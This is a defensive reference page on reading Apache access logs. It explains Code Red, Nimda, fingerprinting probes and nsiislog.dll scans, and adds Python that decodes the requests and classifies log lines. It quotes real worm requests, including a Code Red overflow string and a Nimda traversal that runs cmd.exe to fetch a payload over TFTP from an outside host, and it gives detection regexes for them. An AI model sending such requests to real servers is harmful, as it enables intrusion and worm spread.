The goal of this page is to provide a list of entries that appear in Web Access-Logs and give an explanation of what these entries mean. I intend to update this list fairly frequently, and if any of you out there have any items you'd like to contribute, please pass them along to me here.
The Web Access-Log is the resource to use if you want up-to-the-minute data on what types of requests your web server is receiving. The data itself looks a little raw, but once you are familiar with it, it is useful for spotting unwanted requests from computers infected with viruses, worms and trojans, and from scanners that are sizing up your server. On Apache the log is usually a file named access_log or access.log in the server's logs directory (for example logs/access_log under the Apache installation, or /var/log/apache2/ on many Linux hosts); the CustomLog directive in httpd.conf sets the exact path and format, so check there if you cannot find it. The following is a list of lines you may find cropping up in your logs:
Code Red:
"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 yoursitename.com "-" "-" "-"
This entry is the result of a request from a system that has been compromised by Code Red; the infected host is trying to infect your server in turn. It only affects Microsoft IIS servers that have not been patched (the fix is Microsoft Security Bulletin MS01-033), plus unpatched Cisco 600-series DSL routers, which the request crashes. Any other server simply logs it; the 400 in the line above is what Apache typically returns. The original worm pads the request with "N"; the Code Red II variant uses "X" in the same position, so watch for both.
The "Code Red" worm connects to TCP port 80 on a randomly chosen host, assuming a web server will be found there. Upon a successful connection the attacking host sends the crafted HTTP GET request above, attempting to exploit a buffer overflow in the Indexing Service ISAPI extension (idq.dll, which handles .ida and .idq requests) described in CERT advisory CA-2001-13. The %uXXXX sequences at the end of the request are the overflow payload, written in the non-standard %u Unicode escape that IIS accepted.
Nimda:
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.176.147.146%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0" 404 1962 yoursitename.com "-" "-" "-"
"GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 404 1962 armbrustconsulting.com "-" "-" "-"
Usually you'll see a series of entries like these in your access-log: several similar requests from the same IP within a few seconds. They come from a system that has been infected by Nimda (a.k.a. "W32/Nimda worm" or the "Concept Virus (CV) v.5"). The first request uses the IIS "Web Server Folder Traversal" bug (Microsoft Security Bulletin MS00-078): %c0%af is an overlong UTF-8 encoding of "/", which unpatched IIS decoded only after it had checked the path for "..", so /scripts/..%c0%af../ escaped the scripts directory and reached winnt\system32\cmd.exe. The query string runs cmd.exe /c tftp -i <infecting host> GET cool.dll e:\httpodbc.dll, pulling a copy of the worm from the attacking machine over TFTP, and the second request then asks IIS to load the httpodbc.dll it has just written. Nimda also walks in through the root.exe backdoor that Code Red II leaves behind. On Apache both requests simply produce a 404, as shown.
The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000. Besides the web-server route above, it propagates through email, arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is declared as MIME type "text/html" but contains no text, so the email appears to have no content. The second section is declared as MIME type "audio/x-wav" but contains a base64-encoded attachment named "readme.exe", which is a binary executable.
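As an added example (not code from the original page), the following Python decodes the two Nimda request targets quoted above the way an unpatched IIS did, so you can see why the traversal check missed them and what command the worm was trying to run. The request targets are copied from the log entries on this page; everything else is illustration.

```python
"""Decode the Nimda requests above and show why unpatched IIS treated them as
a path escape.  Added example, not code from the original page."""
from urllib.parse import unquote_to_bytes, unquote_plus

# Request targets copied from the two Nimda log entries on this page.
NIMDA_REQUEST = (
    r"/scripts/..%c0%af../winnt/system32/cmd.exe"
    r"?/c+tftp%20-i%2066.176.147.146%20GET%20cool.dll%20e:\\httpodbc.dll"
)
NIMDA_FOLLOWUP = r"/scripts/..%c0%af../httpodbc.dll"


def decode_overlong_utf8(raw: bytes) -> bytes:
    """Collapse two-byte overlong UTF-8 sequences (lead byte C0 or C1) into the
    ASCII byte they encode: %c0%af -> '/', %c1%9c -> '\\'.  A strict decoder
    rejects these; the vulnerable IIS decoder accepted them, and only after the
    '..' traversal check had already run on the still-encoded path."""
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def resolve_dots(path: str) -> str:
    """Apply '..' and '.' segments the way the filesystem would; backslash and
    slash both separate segments on Windows."""
    parts = []
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def analyze_request(target: str) -> dict:
    """Return what a strict decoder, the lenient (vulnerable) decoder and the
    filesystem each make of a request target, plus the cmd.exe command line
    carried in the query string (empty when there is none)."""
    path, _, query = target.partition("?")
    raw = unquote_to_bytes(path)
    try:
        raw.decode("utf-8")
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    lenient = decode_overlong_utf8(raw).decode("latin-1")
    args = unquote_plus(query)  # '+' and %20 both become spaces
    command = args[3:] if args.startswith("/c ") else args
    return {
        "strict_utf8_accepts": strict_ok,
        "path_after_lenient_decode": lenient,
        "resolved_path": resolve_dots(lenient),
        "command": command,
    }


if __name__ == "__main__":
    for target in (NIMDA_REQUEST, NIMDA_FOLLOWUP):
        for key, value in analyze_request(target).items():
            print(f"{key:26} {value}")
        print()
```

A strict UTF-8 decoder refuses the C0 lead byte outright, which is exactly why the patched IIS (and any modern server) never sees a traversal here; the lenient decoder turns the first request into /winnt/system32/cmd.exe with a tftp command line, and the second into a request for the DLL the first one fetched.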
GET /sumthin
GET /sumthin HTTP/1.0" 404 1962 yoursitename.com "-" "-" "-"
This line started popping up in many access logs over the summer, and increased activity was reported in October. I'm assuming that this is generated by an automated scanner of some sort, but I haven't actually been able to confirm whether this is being done by a program or manually by specific individuals.
Regardless, it is an information-gathering technique. "/sumthin" is simply a path that will not exist on any server, chosen to trigger a 404. Apache's default error page carries a signature line of the form "Apache/1.3.x Server at yoursitename.com Port 80", and every response, error or not, carries a Server header that by default lists the version, the OS and the loaded modules. So whether the probe comes from a scanner or from someone who telnets to port 80 and types the GET by hand, the reply reveals your web server type, version and OS. Replacing the default 404 page with your own (the ErrorDocument 404 directive in httpd.conf) removes the signature from the body, but the header still talks. If you are running Apache, add these lines to your httpd.conf file to cut both down to a bare "Apache":
ServerTokens ProductOnly
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (error documents, FTP directory listings,
# mod_status and mod_info output etc., but not CGI generated documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of: On | Off | EMail
ServerSignature Off
Note that this only trims what the server volunteers. A server can still be fingerprinted from how it orders headers and handles odd requests, so treat these settings as hygiene and keep patching, rather than relying on them to hide an unpatched version.
Blank HEAD Requests
"HEAD / HTTP/1.0" 200 0 armbrustconsulting.com "-" "-" "-"
This entry is typically created by Scooter (the AltaVista robot that crawls the web) or a similar robot named CheckUrl. A HEAD request asks for the headers the server would send for a GET of that page (status, Last-Modified, Content-Length, Content-Type) without the body; the "0" after the "200" in the line above is the byte count and shows that no HTML was sent. No HTML, meta tags or any other page content is returned by HEAD, only by a GET, so a robot that wants the metadata has to follow up with one. Typically a search robot makes requests like this a few days before it does a full crawl of your site, to make sure that the pages it has already indexed still exist and to see from the Last-Modified header whether it needs to refetch them.
netcraft.com entries:
HEAD /cobalt-images/welcome2.gif HTTP/1.0 404 1962 yoursitename.com "-"
This entry often raises a lot of red flags when it's found in access logs, but it is actually fairly harmless. It looks suspicious if you are not running a Cobalt server, because Unix and Microsoft servers don't have a folder or image that matches the request (the Cobalt RaQ appliances ship that image on their default page). What is happening is that a user on netcraft.com has looked up your site name. One of the things netcraft does is work out what your site is hosted on, and this log entry is its check for Cobalt; the 404 you return is itself part of the answer. (Of course, the fact that someone out there is making an effort to find out the specifics of your server software perhaps should raise a warning flag, but this entry in and of itself is harmless.)
nsiislog.dll entries
(thanks to Noam Eppel -- noameppel.com)
192.168.0.1 - - [] "GET /scripts/nsiislog.dll" 404 653 "-" "-"
This is caused by an attempt to exploit Microsoft Windows Media Services; it has no effect on Apache systems, where the 404 above is the whole story. nsiislog.dll is an ISAPI extension that Windows Media Services uses to log client data, and there is a flaw in the way it processes incoming requests: an attacker who sends specially formed requests to the server can cause IIS to fail (Microsoft Security Bulletin MS03-019) or execute code on the server (MS03-022). If you are running a Windows NT-based server with Windows Media Services installed, download the patch!
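As an added example (not code from the original page), here is a small Python classifier that runs the Code Red, Nimda, /sumthin, blank HEAD, netcraft and nsiislog signatures from the entries above over a log. The sample lines are constructed to resemble those entries (private addresses, shortened Code Red padding, plus one normal request for contrast) and the layout assumed is Apache's combined log format: client IP, identd, user, timestamp, request, status, bytes, referer, user agent. The Nimda pattern goes slightly beyond the page by also matching the %c1%9c and %255c traversal encodings and the root.exe backdoor that Nimda probes.

```python
"""Classify access-log lines against the entries catalogued on this page.
Added example, not code from the original page; sample log is constructed."""
import re
from collections import Counter

# Constructed sample lines modelled on the entries above (not real traffic).
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Aug/2001:03:14:07 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-"
10.0.0.7 - - [19/Sep/2001:08:02:11 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.0.0.7%20GET%20cool.dll%20e:\\httpodbc.dll HTTP/1.0" 404 1962 "-" "-"
10.0.0.7 - - [19/Sep/2001:08:02:12 -0400] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 404 1962 "-" "-"
10.0.0.9 - - [03/Oct/2001:22:41:55 -0400] "GET /sumthin HTTP/1.0" 404 1962 "-" "-"
10.0.0.11 - - [04/Oct/2001:01:00:00 -0400] "HEAD / HTTP/1.0" 200 0 "-" "-"
10.0.0.13 - - [05/Oct/2001:10:10:10 -0400] "HEAD /cobalt-images/welcome2.gif HTTP/1.0" 404 1962 "-" "-"
10.0.0.15 - - [07/Jul/2003:13:00:00 -0400] "GET /scripts/nsiislog.dll" 404 653 "-" "-"
10.0.0.20 - - [07/Jul/2003:13:01:00 -0400] "GET /index.html HTTP/1.1" 200 4523 "-" "Mozilla/4.0"
"""

# Combined log format; the protocol is optional because some entries (like the
# nsiislog one above) are logged without it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# (label, pattern over the request path, what the page says the entry means)
SIGNATURES = [
    ("code-red", re.compile(r"^/default\.ida\?[NX]{8,}.*%u", re.I),
     "Code Red worm propagation; only unpatched IIS (.ida ISAPI) is affected"),
    ("nimda", re.compile(r"\.\.(%c0%af|%c1%9c|%255c)|/httpodbc\.dll$|/root\.exe", re.I),
     "Nimda worm propagation via IIS traversal or the Code Red II backdoor"),
    ("sumthin-fingerprint", re.compile(r"^/sumthin$", re.I),
     "deliberate 404 to read the server signature and Server header"),
    ("netcraft-cobalt-probe", re.compile(r"^/cobalt-images/welcome2\.gif$", re.I),
     "netcraft.com platform check; harmless by itself"),
    ("nsiislog-exploit", re.compile(r"^/scripts/nsiislog\.dll", re.I),
     "Windows Media Services nsiislog.dll exploit attempt; no effect on Apache"),
]


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a label for a parsed entry, or None for ordinary traffic."""
    if entry["method"] == "HEAD" and entry["path"] == "/" and entry["bytes"] in ("0", "-"):
        return "head-probe"  # search robot checking the page still exists
    for label, pattern, _ in SIGNATURES:
        if pattern.search(entry["path"]):
            return label
    return None


def scan(log_text):
    """Return (ip, label, status) for every line that matches a signature."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label is not None:
            hits.append((entry["ip"], label, entry["status"]))
    return hits


def per_source(hits):
    """Count (ip, label) pairs; several Nimda hits from one IP is the usual pattern."""
    return Counter((ip, label) for ip, label, _ in hits)


def meaning(label):
    """One-line explanation of a label, taken from the entries on this page."""
    if label == "head-probe":
        return "empty HEAD for /: search robot checking the page still exists"
    return next(desc for name, _, desc in SIGNATURES if name == label)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, label, status in found:
        print(f"{ip:12} {status} {label:22} {meaning(label)}")
    print(per_source(found))
```

The status column is worth keeping next to the label: a 404 or 400 on a Code Red, Nimda or nsiislog line means the request bounced off, whereas a 200 on any of them on an IIS host is the line to investigate.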
Related Links: Using your Web Access-Log